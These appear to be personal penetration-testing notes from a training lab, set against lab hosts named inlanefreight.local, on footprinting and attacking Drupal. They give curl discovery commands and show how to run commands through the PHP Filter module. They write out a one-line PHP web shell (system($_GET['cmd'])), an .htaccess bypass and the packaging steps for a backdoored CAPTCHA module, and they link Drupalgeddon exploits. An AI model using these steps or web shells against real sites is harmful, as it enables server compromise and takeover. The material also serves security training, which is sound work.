Drupal

Newer installs of Drupal by default block access to the CHANGELOG.txt and README.txt files

Drupal supports three types of users by default:

1. Administrator: This user has complete control over the Drupal website.

2. Authenticated User: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.

3. Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Discovery/Footprinting

#Verify Drupal on web server
Intrusionz3r0@htb[/htb]$ curl -s http://drupal.inlanefreight.local | grep Drupal

#Node: Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.
Intrusionz3r0@htb[/htb]$ curl -s http://drupal.inlanefreight.local/node/1

#uncover the version
Intrusionz3r0@htb[/htb]$ curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""

Attacking Drupal

PHP Filter Module

💡

In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default.

• Go to Modules -> (Check) PHP Filter -> Save configuration

• Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview

Intrusionz3r0@htb[/htb]$ curl -s 'http://drupal-qa.inlanefreight.local/node/3?4e3fxxxxxxxcd39ff=id'

---

PHP Filter Module from version 8 onwards

💡

From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves.

Intrusionz3r0@htb[/htb]$ wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

1. Download the most recent version of the module from the Drupal website.

   1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

2. Once downloaded go to Administration > Reports > Available updates.

   1. /admin/reports/updates/install

3. Click on **Browse**, select the file from the directory we downloaded it to, and then click Install.

4. Once the module is installed, we can click on Content and create a new basic page, similar to how we did in the Drupal 7 example. Again, be sure to select PHP code from the Text format dropdown.

   1. /admin/content

Uploading a Backdoored Module

💡

In current versions it's no longer possible to install plugins by only having access to the web after the default installation.

A backdoored module can be created by adding a shell to an existing module. Modules can be found on the drupal.org website. Let's pick a module such as CAPTCHA. Scroll down and copy the link for the tar.gz archive.

Download the archive and extract its contents.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

Create a PHP web shell with the contents

<?php
system($_GET["cmd"]);
?>

Create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

Click on Manage and then Extend click on the + Install new module button

Leveraging Known Vulnerabilities

Drupalgeddon

• CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.

  • https://www.exploit-db.com/exploits/34992

Drupalgeddon2

• CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.

  • https://www.exploit-db.com/exploits/44448

Drupalgeddon3

• CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.

  • https://github.com/rithchard/Drupalgeddon3

  • https://github.com/oways/SA-CORE-2018-004/blob/master/drupalgeddon3.py